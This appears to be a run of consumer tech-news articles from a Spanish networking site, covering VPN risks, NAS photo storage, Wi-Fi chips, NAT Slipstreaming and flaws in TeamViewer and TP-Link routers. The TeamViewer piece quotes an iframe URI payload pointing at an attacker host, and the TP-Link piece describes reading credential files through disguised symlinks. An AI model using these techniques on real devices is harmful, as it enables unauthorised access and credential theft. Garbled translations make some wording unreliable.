Categories
Noticias Seguridad

Why a VPN can be dangerous for security

Why Using a VPN Is Helpful

A VPN is very useful when we are going to connect to one public Wi-Fi network or it could be dangerous. We do not really know who may be behind it and if it has been maliciously configured. We could be the victim of an identity theft attempt. Thanks to using a service of this type, our connection is encrypted. It is as if it were inside a tunnel and no intruder could have access to the content.

It is also interesting when we want bypass blocking of certain services in a specific country. Sometimes there are certain applications that are not available in some territories and we can bypass this block thanks to using this type of software.

It also allows us securely access other devices and even from anywhere. We can do it as if we were within a local network even though we are in another area.

On the other hand, we can gain anonymity on the network. We can prevent our operator from knowing which sites we visit, download anonymously, etc.

How can a VPN become our security enemy

A VPN is designed to help us improve security and privacy, as we have seen. However, sometimes it can turn into the opposite. It can become a real problem affecting our security and privacy.

We are going to detail the reasons that could make a VPN service unsafe.

Vulnerabilities in software

This is perhaps the most typical security problem. Sometimes VPNs can have certain vulnerabilities in the software. Failures in the implementation of the code that can open the door to possible attackers and the information leak of the users.

Fortunately, users can take into account certain measures to protect ourselves or prevent it from affecting us. We need to have the always up-to-date software and with all the security patches installed. Sometimes vulnerabilities arise that are resolved by the manufacturers themselves.

Bad VPN practices

It can happen that the VPN is configured to carry out bad practices that put the security of users at risk. This can happen especially when we install free software and that it does not have all the guarantees.

User data is very valuable. This means that through the Internet there are many platforms and services that are looking for a way to get hold of them. Free VPNs can offer their services in exchange for steal data and information of the users. They can be maliciously configured to do so.

Use of weak protocols

As we know VPNs use different types of protocols to work. We can talk about the PPTP protocol, which was one of the first to be used in the 1990s. Also L2TP, which establishes a tunnel but does not have any type of encryption. A more recent and secure one is IKEv2.

Therefore, a VPN service may not use an appropriate protocol and may be weak. This logically compromises our information and could put our privacy and security at risk. A weak protocol can be broken more easily.

HTTPS attack

HTTPS is the encryption protocol for web pages. It is the typical green padlock that we can see in browsers. When we surf the Internet it is important to verify that a page uses this protocol before entering personal data or information.

Now, a VPN could change the way it carries traffic. Could lead us to a page that has been modified maliciously and seriously compromise our security.

Download VPN with malware

Yes, we may directly download one VPN with malware. This happens when we download an application of this type from unofficial sources. We do not really know if this software could have been maliciously modified.

Our advice to avoid this is always to download from official sources. Also, in the case of VPNs, the ideal is to use paid applications. This way we will avoid possible problems.

Categories
Noticias Redes

Private cloud on NAS, the best alternative to Google Photos

Private cloud on NAS, the alternative to Google Photos

When we use third-party services, as is the case with Google Photos, and especially if they are free, we run the risk that at any given moment they stop providing service. Ultimately these are tools or platforms that need maintenance, a cost in short. As soon as they are no longer profitable or are no longer part of that company’s strategy, they can be forgotten.

This we mentioned is a major problem when we trust that we are going to have it available forever and we start saving photos or videos, for example. However, suddenly they tell us that they limit the service or that it will no longer be available and we have to find an alternative to keep everything the same.

Without a doubt, an ideal alternative to Google Photos is the private cloud on NAS. It gives us a absolute control about our files. We can manage it as we want, have enough storage for all our files and they will also be safe, without depending on third-party services that could even have vulnerabilities. You can see our list of best NAS servers.

Complete control with the private cloud

Have a NAS server allows us to store all types of files and have total control over them. We can save photos and videos in the same way as in Google Photos, but on our own device.

The best option is undoubtedly to use a 2-bay or more NAS server. We can choose RAID 1, which are two equal disks (also known as mirror disks) in which one of them stores everything we are saving, while the other is creating a backup copy. In this way, if at any time we had a problem, the disk had failures or information was lost, we always have that backup copy on the second disk. We have a list of cheap 2-bay NAS servers.

We can also opt for RAID 5, which also provides faster access to content by using one of the disks for fault tolerance that may be on any of the other disks.

Applications to save photos in the private cloud

We have different programs that allow us, in a centralized way, to store photos and videos in our private cloud on NAS. It allows us to have options similar to Google Photos, but all on our own device.

An example is the QNAP photo app. Allows us Upload images from our mobile device even in real time. That is, we can configure it so that each photograph we take is automatically uploaded to our cloud. In this way we avoid data loss in the event that our mobile is damaged or we lose it on a trip. We would have all the content that we are generating in a safe place.

An alternative option is to Photo Station, from Synology. Allows us store and manage all the photographs that we upload to our private cloud in a simple way. We can create albums, share them with other users, access from anywhere, create automatic backups from the mobile, etc.

We also have the option of Photo Gallery, from SCARER. As in the previous cases, it allows us to synchronize our photos on the NAS to have them available anywhere. We can create folders, share them easily, quickly search for a specific image and all of this always under our control.

In short, photo applications like the ones we have mentioned allow us to have full control of photos and videos on our private NAS cloud. An ideal alternative to Google Photos to never lose the photos we take on trips, events or any memory that we do not want to erase.

Much more than saving photos

But the private cloud not only allows us to save photos and videos. It is undoubtedly a very important instrument for both private users and companies. Allows us store all kinds of files and have them always available anywhere. We already know that today it is very common to switch between devices and what better way to centralize everything than to use a NAS server.

It is also a very good solution for create backups and avoid problems such as ransomware, since we would always have everything stored in another place from which to back up the information. It is very important to always generate copies of our devices so as not to lose data in case of a problem.

Another very important issue is the remote work. The Covid-19 pandemic has brought important changes in this regard and more and more people are working telematically. A NAS server also allows us to share work with other users remotely and also have full control without depending on third-party platforms or services.

On the other hand, the private cloud allows us to avoid possible limitations when it comes to share large files, as with free platforms. We can share folders with friends or family regardless of the number and size of files they have.

Categories
Noticias Wi-fi

Broadcom launches a new processor to exceed 2 Gbps

Broadcom launches a new processor

Broadcom has released a new processor that it has named BCM4389. The objective is to be able to exceed 2 Gbps when we browse Wi-Fi networks. This will be achieved by take advantage of the new 6 GHz spectrum and be able to connect multiple devices here. In addition, it will also allow to expand the battery of these teams.

It should be mentioned that this processor, the BCM4389, is the first Wi-Fi 6E It will use the 6 GHz band. For now we will have to wait for it to be operational. As we know, this means that the channel bandwidth is going to be wider, with what this implies.

The BCM4389 processor is designed for smartphones and future augmented and virtual reality devices. The company has announced that thanks to this processor latency will also be reduced. You will reduce congestion by connecting multiple devices and that will give better results.

Logically the last thing we mentioned, the improvement in latency, is going to be fundamental for virtual reality. We have more and more devices that use it and the trend is that it goes to more. Improving connectivity with what it means in stability and quality, will be essential to carry out different functions.

Regarding the devices, Broadcom has indicated that there will be a wide range of home routers, gateways, business access points and devices for BCM4389. Of course, as we have indicated, we will have to wait until the new 6 GHz band is really in operation.

We recommend you read our tutorial on how to scan a WiFi network with Network Scanner, and also how to see who’s connected to Wi-Fi of our home.

We have more and more connected teams

The Wi-Fi networks they are very important today. We have more and more equipment connected wirelessly and that also translates into a greater need for more powerful and capable equipment. If we look back just a few years ago, it was normal to connect by cable from a computer. That has changed thanks in part to the rise of mobile devices.

But the trend indicates that the use of Wi-Fi wireless networks is going to increase. Every time we have more IoT devices in our power and that means that we will need more powerful routers to be able to offer a good connection without interruptions.

All this means that the use of more powerful processors also translates into an increase in speed. That is what Broadcom intends, which wants to exceed 2 Gbps when we navigate through Wi-Fi networks. It is certainly a very interesting speed.

We leave you an article about how to improve Wi-Fi network and also about myths and false truths about Wi-Fi.

Categories
Noticias Seguridad

What data and tools expose us more on the network

Data and tools that are exposed to us on the Internet

As we say, there is certain information and some tools or functions that we use that can expose ourselves especially on the net. They could affect our privacy and security. This means that our computers can suffer problems, that we can be victims of certain types of attacks and identity theft.

IP adress

One of the data that can expose us the most on the network is the IP adress. As we know, each device has an address with which it is identified. They could find out for example our approximate location. It can even be used by advertising companies or our own operator.

To avoid this problem, to prevent the IP address from being leaked, we have at our disposal the possibility of using VPN tools or using the Tor browser.

Metadata in images

The metadata in images they can also expose information that affects our privacy. There will appear data such as the camera we use, the location, date, our name …

This is something that not only affects photos, but also text files. We can always use tools to remove metadata from files.

cookies

Cookies are files that are stored on a device when we browse the Internet. They allow us to be identified when we re-enter a page. A way to save time by not having to log in again. However some cookies they can be used to be tracked by third parties.

To avoid this we can frequently delete cookies, as well as use privacy-based browsers such as Tor.

Extensions

Of course the extensions are tools that can expose us clearly on the network. We use them very frequently in our day-to-day life, but we must bear in mind that they can sometimes be a threat. They could collect personal data, send reports on our browsing and, ultimately, put privacy at risk.

It is very important that when we go to install add-ons in the browser we always do it from official sources. In this way we will avoid problems that compromise us.

Shortened links

The shortened links they can be a threat that affects all types of systems. We have all received a link in this way, where the URL appears shortened. At first this does not mean that it is a threat, but it could be the strategy used by an attacker to hide the real link.

Luckily we can use different platforms that tell us what that link really looks like. This way we will avoid opening one that is actually a threat.

Emails we receive

Finally, the emails we receive can also be exposed to us on the Internet. Through images that are uploaded automatically they could track us. We already saw in another article how to avoid image tracking in Gmail.

Categories
Noticias Seguridad

This new attack directly affects your Internet browser

Cybercriminals do not rest, they are always looking for new targets by exploiting security breaches. In this case, new attacks that affect Internet browsers could compromise our security. Samy Kamkar has discovered the Slipstream NAT attacks that affect our browsers, and that we already explained how they worked in RedesZone. The developers of the most popular browsers are already preparing to block this new attack technique, and today in RedesZone we are going to explain how they will do it.

How Slipstream NAT Attacks Work

The discoverer of the attack was the security researcher Samy kamkar and the attack method has been named as NAT Slipstreaming. Slipstream NAT attacks require victims to visit an attacker’s malicious website or a site with maliciously crafted ads. Samy Kamkar has provided a demonstration scheme of this attack to show how it works.

Slipstream NAT attacks exploit the user’s browser, along with the Application Level Gateway (ALG) connection tracking mechanism built into NAT, routers, and firewalls, by chaining the extraction of an internal IP through a time or WebRTC, automated remote MTU detection and IP fragmentation. Also, because it is the NAT or firewall that opens the destination port, this bypasses any browser-based port restrictions.

Slipstream NAT attacks take advantage of arbitrary control of the data portion of some TCP and UDP packets without include HTTP or other headers. In this case, the attack is based on a new packet injection technique that affects both modern and older browsers. It should also be added that it is a modernized version of the NAT Pinning technique by Samy Kamkar from 2010 which was presented at DEFCON 18 + Black Hat 2010. Additionally, new techniques for local IP address discovery have been included.

Regarding the attack, it should be noted that they require that the NAT or the firewall support ALG (Application Level Gateways), which are mandatory for protocols that can use multiple ports (control channel + data channel) such as SIP and H323 (VoIP protocols ), FTP, IRC DCC, etc.

Other research and proof of concept

Samy Kamkar made other discoveries that are not used in this attack. However, they could potentially be used to carry out other types of attacks. In this sense, he found out:

  • IP fragmentation allows full control of all data in the IP data section. This results in full control of a UDP header, including the source and destination ports in the overflowed packet.
  • If a port has already been seized, the listened port increments until the port overflows to 0.
  • STUN does not have authentication implemented in any modern browser.

You can also download the proof of concept of the Slipstream NAT attacks from here.

Browsers prepare to block this attack

Those responsible for the web browsers to stop the Slipstream NAT attacks plan to block the TCP ports 5060 and 5061 used in this attack by adding them to the restricted list.

According to Adam Rice who is the developer of Chromium, it is intended to block HTTP and HTTPS connections to SIP ports 5060 and 5061. Thus, this will cause the connections to the servers that use the ports mentioned above to fail. Thanks to these changes, the connections to servers on those ports such as http://web.com:5060/ or https://web.com:5061/ would no longer work. In addition, they would improve security measures, as tests that trigger a server on an arbitrary port are expected to be more difficult to use than they are right now.

Finally, the browsers Firefox, Safari, Chromium and Chrome are working to have the Slipstream NAT attacks solved as soon as possible, but it is not yet known when they will do so, on November 4 the solution to the problem was incorporated into the bug tracker of Chromium, so it will still take a few weeks to see it in the final stable version.

The article This new attack directly affects your Internet browser was published in RedesZone.

Categories
Noticias Seguridad

What is and why hidden malware increases in encrypted traffic

What is malware hidden in encrypted traffic

We can think that when browsing the Internet for a page that is encrypted, which has the HTTPS in the URL, it is already reliable. It is true that this is an indication that we must observe when we are going to enter personal data or make a payment. However, it does not by itself mean that it is already a totally secure site.

This is precisely what hackers take advantage of. They are based on a greater confidence of users when browsing pages that are encrypted to, precisely there, hide the malware.

Although apparently a page that is HTTPS, does not mean that they cannot contain malware. Cybercriminals, as we say, is precisely where they are sneaking malware the most with the aim of infecting victims’ systems. It is not something new, but it is something that is gaining much prominence.

A group of security researchers from Zscaler has presented a report in which they show how hidden malware in encrypted traffic has grown by 260% during the first nine months of 2020 compared to the same period of the previous year.

The pandemic pushes these types of attacks

They also indicate that Covid-19 pandemic it has partly increased attacks using malware hidden in encrypted SSL / TLS traffic. For example, ransomware delivered through SSL / TLS channels between March and September has grown by 500%. Most of these attacks have been directed at technology and telecommunications companies, but also at healthcare organizations.

The rise of telecommuting, one of the changes that the Covid-19 pandemic has caused, is another cause of the increase in this type of attacks directed at users. More and more people work from home and in many cases these are users who do not have the necessary knowledge to be safe on the Internet.

Zscaler’s analysis also shows an increase in attacks that are based on SSL / TLS and that have been delivered through reliable cloud storage services such as Google Drive, Dropbox, OneDrive or AWS. They host malicious content on these services that are now widely used due to the pandemic and the increase in remote work.

Without a doubt, this upward trend is a great challenge for organizations. In addition, security tools are not enough to protect us from these types of problems. It is essential to maintain common sense and not make mistakes. In another article we leave you with a series of tips to avoid email malware.

Categories
Noticias Seguridad

A security breach allows the TP-Link AC1750 router to be hacked

Security issues with the TP-Link AC1750 router

Specifically this problem that we mentioned affects the router TP-Link AC1750 (Archer C7). It is one of the most popular and sold of the company. As with many modern routers, this model has a USB port to connect other equipment, such as printers or memories to modify the firmware or share content on the network.

Precisely that USB port is what has caused the problem. When a USB drive is connected, the router activates an SMB share, enables FTP, and powers up a DLNA media server. The contents of the unit can be accessed using these protocols.

A security researcher has tested to see what could happen with a malicious flash drive. It found a vulnerability that can be exploited to read pre-authentication from the router’s file system. This would allow the stealing of the login credentials. It is possible through symbolic links.

Keep in mind that the TP-Link AC1750 router run OpenWRT. This means that symbolic links can point to files normally present on Linux-based machines. The malicious USB drive must be formatted with an NTFS partition and the content will later be accessible over the network.

Now, this security researcher has found that by default, symbolic links they are not removed from the reference if accessed via SMB or FTP. However, symbolic links will be followed if accessed via DLNA. The interesting thing is that only multimedia file types will be served. This requirement can be achieved by naming the symbolic link with a multimedia extension, such as .wav. For example, a symbolic link to / etc / shadow would be called shadow.wav.

An important point made by the security researcher is that the plain text password for the administrative web interface it is stored in / etc / config / usbshare by default. With this password, we could change the router’s configuration options.

The researcher created three symbolic links to test his theory. After plugging in the flash drive he was able to access the files via DLNA using a client like VLC. We can see the picture showing in Medium.

Here we can see how “usbshare” can be accessed via HTTP at http://192.168.0.1:8200/MediaItems/21.wav. The content of this file can be downloaded using the link.

When you acquire the necessary credentials, you will be able to access the web interface and access the file system.

The attack needs physical access

As we can see, this attack is going to require physical access to the device. It is not a scenario that we can consider as ordinary. However, it could happen in a work environment or if we invite someone to our house and they want to try our router. Also that person could have the password to access.

In case someone attacked the router with this method, they could, among other things, create a VPN for their web traffic to pass through this hacked device.

The vulnerability has been registered as CVE-2020-5795. At the time of writing this article, TP-Link has already released a patch to correct the security flaw. It is important that users always have the latest versions available. In this case we can download it from the official Web.

We leave you a tutorial on how to audit a router with Routersploit.

Categories
Noticias Seguridad

LoRaWAN, the threat that puts IoT devices at risk

LoRaWAN, the latest threat to IoT devices

A group of security researchers from IOActive have discovered that the LoRaWAN protocol has certain security problems that can put our devices at risk. This protocol is used globally to transmit data between IoT devices.

We can say that the LoRaWAN protocol is used at different levels. It is used by IoT devices industrial, but also at the user level in homes. Now, according to this group of security researchers that we echo, this protocol has vulnerabilities that can be exploited. Specifically, the encryption of communications between devices could be easily obtained.

With this problem, a widespread disruption devices, as well as leaving the network vulnerable and exposed, something that would affect the privacy of users. It could expose the data that is transmitted between devices. We already know that privacy is a very important factor for users and it should always be maintained.

We could mention denial of service attacks as one of the options that a potential attacker would have. Once the attackers obtain the encryption keys they could gain access to the network and cause these types of attacks and disrupt communications between connected devices.

They could also send false data. They do this by intercepting communications and replacing them with data that is false. They could, among other things, hide malicious activities.

The biggest problem, as IOActive researchers point out, is that a user or organization would not be able to tell if a LoRaWAN network is under attack or has been attacked. This, as we can imagine, makes it a significant risk for users.

How to protect the security of IoT devices

We are going to give a series of tips to maintain security in IoT devices. One of the most important is always properly encrypt computers and change the factory settings. Many of them come with generic passwords that can be easily exploited by a hacker with the necessary knowledge. This means that we must change and create really strong keys.

It will also be necessary to have the latest security updates. In many cases vulnerabilities emerge that are exploited by intruders to carry out their attacks. We need to install security patches and updates to fix those bugs.

Lastly, common sense will be vital. It is important that we take care of the devices when installing software and add-ons. Make sure to always install them from official sources. This is the only way to ensure that we are not installing software that has been maliciously modified.

Categories
Noticias Seguridad

Vulnerability in TeamViewer allows intruders without password

A bug in TeamViewer allows intruder access

As we say, TeamViewer is an important tool that allows the remote access to computers on the network. This time the news is that it has a vulnerability that puts the safety of users at risk. It would allow a possible intruder to access that computer without leaving a trace and to carry out different types of attacks.

It is a reality that on many occasions security flaws arise that affect all types of software that we use in our day to day. They can compromise our privacy and put devices at risk. These vulnerabilities generally receive updates from the developers. That is what has happened in this case.

TeamViewer has rushed to release a patch to correct this important flaw. The vulnerability has been registered as CVE-2020-13699 and has been rated high severity.

To execute an attack, a user would need to navigate to a malicious page that load an iframe in the web browser, possibly hidden or as small as a pixel, to avoid being seen by an intruder. The iframe loads itself using the “teamviewer10:” URI scheme, which tells the browser to start the TeamViewer application installed on the computer.

These URI schemes Customs are used by locally installed applications that allow the user to launch them from their browser. For example, URLs that start with “skype:” in the browser would start Skype. Other commonly used apps like Slack, Zoom, and Spotify use similar URI structures.

What the attacker would do to exploit this TeamViewer vulnerability is to set the src attribute of the iframe to ‘teamviewer10: –play attacker-IP share fake.tvs’. What this command does is that the TeamViewer application that is installed connects to the attacker’s server through the SMB protocol.

Access without password

It should also be borne in mind that a potential attacker would not need to know the user’s password. They could be authenticated automatically and thus gain access.

From TeamViewer they indicated that this problem affected various versions of this tool for Windows. Specifically, it affects versions 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 and 15.8.3. However, they have already released the patch for all of them. From RedesZone we recommend updating to the latest version. This is something that we must always apply to all types of software that we use. You can see the ad on the official TeamViewer channel where they mention that the problem has already been solved.

As we have mentioned, remote work has become something very present in our day to day. We leave you some tips to telework safely.

Categories
Noticias Seguridad

Sending emails to the wrong recipient: risks and consequences

The work emails They are considered a gold mine. The amount of high-value and sensitive information we deal with and manipulate on a daily basis is so great that, with a simple chain, a cybercriminal can have an entire organization in their hands. Let’s not even talk about whether the data contained in that chain involves very valuable assets such as data from employee payroll.

It costs us to accept it, but the collaborator himself represents the main threat for your organization. Human error is much more damaging than we think. Inattention, rush, and even disinterest, all these factors influence us to make this small but big mistake: sending an email to the wrong recipient.

More than 100 “wrong” emails a week

It’s a barbarity. The company Tessian recently released a report that in just one week, 130 or more wrong emails are sent Unfortunately, several of these messages contain confidential corporate information and recipients mistakenly have access to them.

On the other hand, this error of sending emails to wrong recipients happens more than 200,000 times year. Although the recipient by mistake corresponds to your organization, the high risk of data leakage or any type of attack remains. Especially because employees have management of the internal activities of their sector and between sectors as well. Although this report focuses on the inhabitants of the United Kingdom, it is a trend that applies to practically every country on the globe.

Is it possible to be wrong so many times?

Of course. Human error (inattention, especially) can go as far as that. But what if this results in my account being compromised? This is also possible. The wrong recipients can appear in our address book without our noticing or paying attention. They can be differentiated from real addresses by a letter, a number or a word of considerable length.

Pay close attention before sending any corporate email messages. If necessary, please check address by address, you must. It may be that your email address is infected by some type of virus or malware. If so, we recommend communicating it to your support department so they can act immediately.

The exit door to data breaches

In the UK alone, still according to Tessian’s report, 1,357 data breaches have been reported. All of these occurred as a result of emails sent by mistake. The increase in this type of event increased by 300%. Alarming, right? There is no better advice than pay due attention before sending a message. An extra minute doing a little review makes a difference.

We recommend you read our tutorial on the best temporary emails to protect your privacy and security.